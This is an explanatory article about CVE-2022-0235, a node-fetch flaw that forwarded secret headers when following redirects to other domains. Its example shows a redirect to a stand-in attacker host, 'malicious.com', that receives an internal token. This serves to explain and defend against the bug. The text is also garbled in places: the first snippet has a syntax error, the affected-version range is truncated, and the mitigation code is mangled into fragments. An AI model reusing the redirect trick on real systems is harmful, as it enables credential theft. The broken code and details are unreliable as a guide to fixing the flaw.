CVE-2022-0235 - How node-fetch's Bug Could Leak Your Secrets (Explained with Example)

Open-source libraries make web development quick and easy. But sometimes, even popular ones contain vulnerabilities that can endanger your applications. One such case was discovered in node-fetch, a widely used library to make HTTP requests in Node.js. This article will explain CVE-2022-0235, which allowed sensitive information to be leaked, walk you through an example, and show how to stay safe.

What is node-fetch?

node-fetch is a lightweight module that brings the window.fetch API to Node.js. It’s a tool used by millions of developers and hundreds of thousands of projects.

const fetch = require('node-fetch');

fetch('https://api.example.com/data';)
  .then(res => res.json())
  .then(json => console.log(json));

What is CVE-2022-0235?

- CVE-2022-0235 describes a security vulnerability where node-fetch could accidentally send sensitive internal data, like headers or authentication tokens, to external servers.

Affected versions: 2.6. - 2.6.6

In simple words: if your app uses node-fetch to access both internal (safe) and external (untrusted) websites, a certain bug could accidentally send private information to external websites where hackers could steal them.

How Does the Vulnerability Work?

The bug has to do with the way node-fetch handles HTTP headers. Sometimes, code that fetches internal resources (such as internal APIs) may re-use the same headers in later, possibly external, requests. If a malicious server can control redirection, it can trick node-fetch into sending internal headers — like cookies, API keys, or authentication tokens — to outside domains.

This happens because node-fetch, during redirect handling, did not properly sanitize headers when following redirects to cross-domain targets.

Example Exploit

Let’s look at how a real-world exploit could work.

Scenario

- Your Node.js app fetches http://internal-api.local/data using node-fetch and sends a secret header: X-Internal-Token: super-secret-token.
- But the internal server responds with a 302 Redirect to an external site, like http://malicious.com/steal.
- node-fetch, because of its bug, will follow the redirect and send all the same headers, including your X-Internal-Token, to the external, untrusted server.

Sample Code

const fetch = require('node-fetch');

// Vulnerable code!
fetch('http://internal-api.local/data', {
  headers: {
    'X-Internal-Token': 'super-secret-token',
  },
  redirect: 'follow', // node-fetch will follow all redirects
})
  .then(res => res.json())
  .then(json => console.log(json));

If http://internal-api.local/data responds with

HTTP/1.1 302 Found
Location: http://malicious.com/steal

Then node-fetch sends

GET /steal HTTP/1.1
Host: malicious.com
X-Internal-Token: super-secret-token  <-- BAD!

Now, the attacker at malicious.com gets your secret token.

References

- NVD Entry
- GitHub Security Advisory
- node-fetch Changelog

`js

fetch('http://internal-api.local/data', {

},

redirect: 'manual', // Only handle redirects you trust

Summary

- CVE-2022-0235 allowed node-fetch to leak sensitive information by following redirects and sending sensitive headers to external servers.

Further Reading

- Official CVE-2022-0235 Details
- node-fetch Security Advisory
- General npm Security Best Practices


Have you updated your node-fetch yet? Now’s the time!

Timeline

Published on: 01/16/2022 17:15:00 UTC
Last modified on: 01/25/2022 20:00:00 UTC